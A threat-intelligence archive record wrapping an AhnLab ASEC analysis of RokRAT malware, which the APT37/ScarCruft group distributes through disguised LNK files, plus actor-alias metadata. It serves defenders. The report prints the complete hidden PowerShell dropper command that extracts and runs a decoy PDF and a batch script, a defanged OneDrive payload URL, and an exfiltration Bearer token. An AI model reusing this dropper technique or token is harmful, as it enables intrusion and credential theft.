{
	"id": "55c0365e-4416-4610-804b-c295510d91fc",
	"created_at": "2026-04-06T00:06:51.863673Z",
	"updated_at": "2026-04-10T03:38:06.367324Z",
	"deleted_at": null,
	"sha1_hash": "612d054ed65b18e5a453616528f852a652020e97",
	"title": "RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft) - ASEC",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3052997,
	"plain_text": "RokRAT Malware Distributed Through LNK Files (*.lnk): RedEyes (ScarCruft) - ASEC\r\nBy ATCP\r\nPublished: 2023-04-20 · Archived: 2026-04-05 15:14:16 UTC\r\nAhnLab Security Emergency response Center (ASEC) confirmed that the RedEyes threat group (also known as APT37, ScarCruft), which distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month, has also recently distributed the RokRAT malware through LNK files. RokRAT is malware that is capable of collecting user credentials and downloading additional malware. The malware was once distributed through HWP and Word files. The LNK files that were discovered this time contain PowerShell commands that perform malicious behavior by creating and executing a script file along with a normal file in the Temp folder. The confirmed LNK filenames are as follows:\r\n230407Infosheet.lnk\r\nApril 29th 2023 Seminar.lnk\r\n2023 Personal Evaluation.hwp.lnk\r\nNK Diplomat Dispatch Selection and Diplomatic Offices.lnk\r\nNK Diplomacy Policy Decision Process.lnk\r\nThe “230407Infosheet.lnk” file is disguised with a PDF icon and contains a malicious PowerShell command.\r\nhttps://asec.ahnlab.com/en/51751/\r\nPage 1 of 6\r\nFigure 1. Properties of the LNK file\r\nThe LNK file contains not only a PowerShell command, but also the data of a normal PDF file along with malicious script code. Furthermore, there are dummy bytes that start from 0x89D9A all the way to 0x141702A.\r\nFigure 2. Dummy data that exists at the end of the LNK file\r\nThe PowerShell command that is executed through cmd.exe upon executing the LNK file is as follows:\r\n/c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') { $dirPath = '%temp%' }; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00014A0DC4} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00561396 -ReadCount 00561396; $pdfPath = '%temp%\\230407정보지.pdf'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002474)) -Encoding Byte; ^\u0026 $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00564634 -ReadCount 00564634; $exePath = '%temp%\\230412.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00561396)) -Encoding Byte; ^\u0026 $exePath;\r\nThe LNK file is read up to offset 0x890F4 and, after the first 0x9AA bytes are skipped, the remainder is saved and executed in the Temp folder under the filename “230407Infosheet.pdf”. Afterward, the LNK file is read up to offset 0x89D9A and, after the first 0x890F4 bytes (the PDF data) are skipped, the remainder is saved and executed in the Temp folder under the filename “230412.bat”.\r\nFigure 3. PDF data located at 0x9AA of the LNK file\r\nFigure 4. Script code located at 0x890F4 of the LNK file\r\nFigure 5. Files created in the Temp folder\r\nThe threat actor executes a normal PDF file to make the behavior appear normal before carrying out the malicious behavior through the script file.\r\nFigure 6. 230407Infosheet.pdf (normal file)\r\nThe script file executed at the same time contains the following PowerShell command, which executes malicious commands stored as hex values.\r\nFigure 7. 230412.bat\r\nThe final PowerShell command that is executed downloads the encoded data from hxxps://api.onedrive[.]com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRiZnpnVU14TmJJbkM2Q0k_ZT1WZElLSj, decodes it, and injects it into the PowerShell process to perform malicious behavior.\r\nFigure 8. Final PowerShell command that is executed\r\nFigure 9. Malicious file uploaded to OneDrive\r\nThe injected data is the RokRAT malware, which is capable of collecting user credentials and downloading additional malware. The collected information is sent to the threat actor’s cloud server using cloud services such as pCloud and Yandex. The User-Agent in the request header is disguised as Googlebot. The authentication (Bearer) token used to send files is as follows:\r\nAuthorization: Bearer RSbj7Zk5IYK5ThSbQZH4YBo7ZxiPOCH94RBbFuU9c04XXVJg7xbvX\r\nThe additional normal files executed through the malicious LNK files are as follows:\r\nFigure 10. April 29th 2023 Seminar.pdf created through April 29th 2023 Seminar.lnk\r\nFigure 11. 230402.hwp created through NK Diplomacy Policy Decision Process.lnk\r\nAs RokRAT has been in distribution for a while and is being distributed in various forms such as Word files, users are advised to take extra caution.\r\nReddoor (RokRAT) Malware Analysis Report – May 9, 2022\r\nKorean APT Attacks Using Ruby Script Analysis Report – Apr. 7, 2021\r\n[File Detection] Dropper/LNK.Agent (2023.04.08.00) Downloader/BAT.Agent (2023.04.08.00)\r\nAdditional IOCs are available on AhnLab TIP.\r\nGain access to related IOCs and detailed analysis by subscribing to AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/51751/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://asec.ahnlab.com/en/51751/"
	],
	"report_names": [
		"51751"
	],
	"threat_actors": [
		{
			"id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e",
			"created_at": "2025-08-07T02:03:25.082908Z",
			"updated_at": "2026-04-10T02:00:03.744649Z",
			"deleted_at": null,
			"main_name": "NICKEL FOXCROFT",
			"aliases": [
				"APT37 ",
				"ATK4 ",
				"Group 123 ",
				"InkySquid ",
				"Moldy Pisces ",
				"Operation Daybreak ",
				"Operaton Erebus ",
				"RICOCHET CHOLLIMA ",
				"Reaper ",
				"ScarCruft ",
				"TA-RedAnt ",
				"Venus 121 "
			],
			"source_name": "Secureworks:NICKEL FOXCROFT",
			"tools": [
				"Bluelight",
				"Chinotto",
				"GOLDBACKDOOR",
				"KevDroid",
				"KoSpy",
				"PoorWeb",
				"ROKRAT",
				"final1stpy"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "bbe36874-34b7-4bfb-b38b-84a00b07042e",
			"created_at": "2022-10-25T15:50:23.375277Z",
			"updated_at": "2026-04-10T02:00:05.327922Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"APT37",
				"InkySquid",
				"ScarCruft",
				"Group123",
				"TEMP.Reaper",
				"Ricochet Chollima"
			],
			"source_name": "MITRE:APT37",
			"tools": [
				"BLUELIGHT",
				"CORALDECK",
				"KARAE",
				"SLOWDRIFT",
				"ROKRAT",
				"SHUTTERSPEED",
				"POORAIM",
				"HAPPYWORK",
				"Final1stspy",
				"Cobalt Strike",
				"NavRAT",
				"DOGCALL",
				"WINERACK"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "552ff939-52c3-421b-b6c9-749cbc21a794",
			"created_at": "2023-01-06T13:46:38.742547Z",
			"updated_at": "2026-04-10T02:00:03.08515Z",
			"deleted_at": null,
			"main_name": "APT37",
			"aliases": [
				"Operation Daybreak",
				"Red Eyes",
				"ScarCruft",
				"G0067",
				"Group123",
				"Reaper Group",
				"Ricochet Chollima",
				"ATK4",
				"APT 37",
				"Operation Erebus",
				"Moldy Pisces",
				"APT-C-28",
				"Group 123",
				"InkySquid",
				"Venus 121"
			],
			"source_name": "MISPGALAXY:APT37",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9b02c527-5077-489e-9a80-5d88947fddab",
			"created_at": "2022-10-25T16:07:24.103499Z",
			"updated_at": "2026-04-10T02:00:04.867181Z",
			"deleted_at": null,
			"main_name": "Reaper",
			"aliases": [
				"APT 37",
				"ATK 4",
				"Cerium",
				"Crooked Pisces",
				"G0067",
				"Geumseong121",
				"Group 123",
				"ITG10",
				"InkySquid",
				"Moldy Pisces",
				"Opal Sleet",
				"Operation Are You Happy?",
				"Operation Battle Cruiser",
				"Operation Black Banner",
				"Operation Daybreak",
				"Operation Dragon messenger",
				"Operation Erebus",
				"Operation Evil New Year",
				"Operation Evil New Year 2018",
				"Operation Fractured Block",
				"Operation Fractured Statue",
				"Operation FreeMilk",
				"Operation Golden Bird",
				"Operation Golden Time",
				"Operation High Expert",
				"Operation Holiday Wiper",
				"Operation Korean Sword",
				"Operation North Korean Human Right",
				"Operation Onezero",
				"Operation Rocket Man",
				"Operation SHROUDED#SLEEP",
				"Operation STARK#MULE",
				"Operation STIFF#BIZON",
				"Operation Spy Cloud",
				"Operation Star Cruiser",
				"Operation ToyBox Story",
				"Osmium",
				"Red Eyes",
				"Ricochet Chollima",
				"Ruby Sleet",
				"ScarCruft",
				"TA-RedAnt",
				"TEMP.Reaper",
				"Venus 121"
			],
			"source_name": "ETDA:Reaper",
			"tools": [
				"Agentemis",
				"BLUELIGHT",
				"Backdoor.APT.POORAIM",
				"CARROTBALL",
				"CARROTBAT",
				"CORALDECK",
				"Cobalt Strike",
				"CobaltStrike",
				"DOGCALL",
				"Erebus",
				"Exploit.APT.RICECURRY",
				"Final1stSpy",
				"Freenki Loader",
				"GELCAPSULE",
				"GOLDBACKDOOR",
				"GreezeBackdoor",
				"HAPPYWORK",
				"JinhoSpy",
				"KARAE",
				"KevDroid",
				"Konni",
				"MILKDROP",
				"N1stAgent",
				"NavRAT",
				"Nokki",
				"Oceansalt",
				"POORAIM",
				"PoohMilk",
				"PoohMilk Loader",
				"RICECURRY",
				"RUHAPPY",
				"RokRAT",
				"SHUTTERSPEED",
				"SLOWDRIFT",
				"SOUNDWAVE",
				"SYSCON",
				"Sanny",
				"ScarCruft",
				"StarCruft",
				"Syscon",
				"VeilShell",
				"WINERACK",
				"ZUMKONG",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434011,
	"ts_updated_at": 1775792286,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/612d054ed65b18e5a453616528f852a652020e97.pdf",
		"text": "https://archive.orkl.eu/612d054ed65b18e5a453616528f852a652020e97.txt",
		"img": "https://archive.orkl.eu/612d054ed65b18e5a453616528f852a652020e97.jpg"
	}
}